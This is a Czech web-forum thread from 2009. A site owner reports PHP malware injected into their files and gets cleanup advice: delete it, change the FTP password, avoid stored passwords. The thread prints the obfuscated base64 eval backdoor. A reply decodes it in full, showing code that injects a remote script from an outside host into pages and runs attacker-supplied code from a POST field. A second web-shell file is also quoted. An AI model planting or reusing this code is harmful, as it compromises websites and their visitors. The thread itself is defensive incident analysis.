| Autor | Zpráva | ||
|---|---|---|---|
| msigmund Profil |
#1 · Zasláno: 22. 10. 2009, 10:00:46
Dobrý den,
prosím vás všechny odborníky o pomoc. Prosím hodně. Na stránkách se mi přes noc objevil tento kód a stránky nefungovaly. Stačilo ho smazat, ale co se stalo prosím a dá se tomu předejít. <?php eval(base64_decode('aWYoIWlzc2V0KCRsYXcxKSl7ZnVuY3Rpb24gbGF3KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc 2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW 15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYX RjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSR zPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4j aXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqO lxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaX MnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk50WTJ4MVpHaHBZVzVoTG1sdUwyVjJ aVzUwWDJsdFlXZGxMMk50WTE5c2RXUm9hV0Z1WVY5b2IzTndhWFJoYkM1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO 31mdW5jdGlvbiBsYXcyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGxhdzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGxhdzEpKWNhbGxfdXNlcl9mdW 5jKCRsYXcxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2xhdycpcmV0dXJuO2Vsc2V pZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1j b3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdsYXcnKTtmb3IoJGk9M DskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kbGF3bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGF 3MicpKSE9J2xhdzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?> Děkuji všem. |
||
| roberta Profil |
#2 · Zasláno: 22. 10. 2009, 10:08:11
vymaž to a zmeň si ftp heslo.
|
||
| Alphard Profil |
#3 · Zasláno: 22. 10. 2009, 10:09:14
|
||
| Joker Profil |
#4 · Zasláno: 22. 10. 2009, 10:26:02 · Upravil/a: Joker
msigmund:
Virus. Viz odkaz od Alpharda. Pro zajímavost, po dekódování všech base64 a vypadá kód toho viru takhle: Podstatný je asi hlavně poslední řádek (skript čeká na předání nějakého PHP kódu, který pak vykoná) if(!isset($law1)){
function law($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v)
if(count(explode("\n",$v))>5)
{
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);
}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0] as $v)
if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a='<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ></script>'),'',$s);
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))
$s.=$a;return $s;
}
function law2($a,$b,$c,$d)
{
global $law1;
$s=array();
if(function_exists($law1))
call_user_func($law1,$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='law')
return;
elseif($a=='ob_gzhandler')
break;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--)
{
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start('law');
for($i=0;$i<count($s);$i++)
{
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
$lawl=(($a=@set_error_handler('law2'))!='law2') ? $a:0;
eval(base64_decode($_POST['e'])); |
||
| msigmund Profil |
#5 · Zasláno: 22. 10. 2009, 11:05:52
Právě to čistím a narazil jsem ještě na soubor "gifimg.php" ve složce images a kód je
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> Jinak to infikovalo všechny soubory "index.php - config.php - db.php" ve všech složkách. |
||
| msigmund Profil |
#6 · Zasláno: 22. 10. 2009, 11:29:53
Je to hotové, ale chtěl jsem se ještě zeptat píšou nepoužívat Total Commander, ale já se dočetl na internetu, že verze 7.50a má lepší šifrování hesel tak jí používám. Já píšu v PSPadu a soubory posílám přes TC. Jinde hesla nemám. Co byste mi poradily.
Děkuji všem za velkou pomoc. |
||
| Joker Profil |
#7 · Zasláno: 22. 10. 2009, 11:39:10
msigmund:
„Co byste mi poradily.“ Jestli to tedy není otázka jen pro programátorky a mohou radit i muži, asi nejlepší varianta je nemít uložené heslo a zadávat ho při připojení zvlášť. Anebo zkusit trik s ukládáním pozměněného hesla (viz odkaz v příspěvku #3) |
||
| Bubák Profil |
#8 · Zasláno: 22. 10. 2009, 12:51:57
msigmund:
„verze 7.50a má lepší šifrování hesel tak jí používám“ A máš šifrování pomocí "hlavního hesla" zapnuto? |
||
| msigmund Profil |
#9 · Zasláno: 22. 10. 2009, 13:42:40
Ano ke každému heslu dávám i hlavní heslo.
Je to šifrování bezpečné nebo není. |
||
|
Časová prodleva: 17 let
|
|||
0